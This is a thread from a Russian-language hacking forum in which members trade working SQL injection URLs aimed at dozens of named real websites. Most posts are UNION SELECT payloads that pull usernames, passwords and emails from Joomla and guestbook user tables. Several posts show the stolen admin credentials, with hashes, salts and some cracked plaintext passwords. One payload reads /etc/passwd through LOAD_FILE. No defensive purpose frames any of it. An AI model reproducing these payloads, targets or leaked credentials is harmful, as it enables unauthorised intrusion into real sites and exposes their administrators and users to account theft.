SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://avtovaz.ru/model_info.php?id=23408+order+by+14/*
     
  2. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    HTML:
     http://www.mitsar.info/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.skodapart.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.tnn-plus.ru/http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://reenergy.by/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*  
     
    1 person likes this.
  3. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    вроде небыло.в поиске пусто.

    EDU
     
    #4723 $n@ke, 11 Feb 2008
    Last edited: 11 Feb 2008
  4. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    HTML:
      http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.psy-con.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.yourczech.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://paramedik.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*  
     
  5. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    therondp:cfef632b3d7e57efb0f30c5ff9e91abf:BsmotIJaEl4n7U1e

    Code:
    http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    bacanak:26038c3e7eb3efb12aac8afa64b8aec1

    Code:
    http://www.lppa.org.ls/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
    
    admin:21232f297a57a5a743894a0e4a801fc3
    admin:admin

    Code:
    http://www.guvengrafik.com/tr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    хостер кажется) и домены регает)
    administrator:90486f2dcc50866c520f11ff7bb467c6:yj

    Code:
    http://www.chkms.ch/cms/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    тоже хостер кажется)
    admin:8f539ba7f137838d79190c4fbf4c7fcf:eDSKldF6i9wjTBhk

    Code:
    http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    admin:7d63bf9dd9782614b7a8ad08471efdab:ELjNXMlvo6WJXDK2

    Code:
    http://www.soulofthenet.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
    
    admin:b99e3a9bb071a4a1bf92b999855677fd
     
    3 people like this.
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,table_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/information_schema.tables/*

    Не вышло((
     
    1 person likes this.
  7. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    google.com reply:

    Возможно вы имели ввиду:

    HTML:
    http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=1+UNION+SELECT+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
     
    1 person likes this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Я по образцу делал,думал прокатит- такого метода вообще не встречал.Мошь опишешь вкратце.что ты сделал? Я понял,что ты преобразовал в латин...А почему так не знаю(.И гайдов я таких не видел...........................
     
  9. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    HTML:
    http://www.champ.co.za/clients/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
    HTML:
    http://littlelindsay.com/guest/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
    HTML:
    http://www.svg-soccer.de/B1/gbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
    HTML:
    http://www.paulnicholasonline.com/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
    HTML:
    http://www.djmanumax.nl/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
    сдесь даже хеши побрутил =)))
    вот то что осилил
    D@|\\||\\|Y:daa823a5957eb5bf86d93b22473cc241:eltax
    cemonvicta:1a9e8503f4f1a5a08d550aee1fb9ae05:suikervrij
    PS по ходу я сегодня спать то не буду да?! завтра наботу веть (((
     
    #4729 satana8920, 12 Feb 2008
    Last edited: 12 Feb 2008
    2 people like this.
  10. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    HTML:
      http://www.mfgang.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.cornel.biz/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://super-plitka.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
      
     
    1 person likes this.
  11. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://softall.ru/item.php3?id=1483'
    больше ниче не могу сделать ) (((
    А сайт кстати довольно крупный
     
  12. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    во первых обычный сайт без посещаемости -НЕ КРУПНЫЙ
    во вторых тебе не в эту тему - тебе в "помощь по скулю?"
    в третеих вот
    5.0.26
    Модер - Dizel_12:Dizel_12
     
    #4732 159932, 12 Feb 2008
    Last edited: 12 Feb 2008
    3 people like this.
  13. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    http://www.capetown2007.co.za/articles.php?id=38+union+select+table_name+1,2,3,4,5,6,7+from+information_schema.tables/*
    заипалсо лимитом листать таблицы ))
     
    1 person likes this.
  14. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://www.poetryclub.com.ua/getpoem.php?id=54504'
     
    1 person likes this.
  15. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    один из крупнейших софт-порталов )
     
  16. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    rankor777, вылаживай раскрытые скули или получишь минус
     
  17. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://saveoka.com/opinion.php?id=-1+union+select+1,2,3,version(),5/*
    Сайт про ОКУ :)
     
    1 person likes this.
  18. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://top.privetparis.com/index.php?cat_id=99999+union+select+1,2,3,4,5,6/*
    pp_top@localhost: pp_top:5.0.45-community-log



    Code:
    http://www.aqualang.ru/index.php?cat_id=99999'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/*
    mh3spea_vallwww@localhost:mh3spea_aqualang:5.0.45-community-log



    Code:
    http://www.dotfiles.com/index.php?cat_id=99999+union+select+1/*
    blog@localhost:dotfiles:5.0.32-Debian_7etch4-log
     
    1 person likes this.
  19. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Довольно извесный ресурс
    Code:
    http://hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+1,2,3,TABLE_NAME,5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES--
    http://hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES--
     
    1 person likes this.
  20. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    HTML:
      http://wmotors.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.maximus-omsk.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*   
     
    3 people like this.
Thread Status:
Not open for further replies.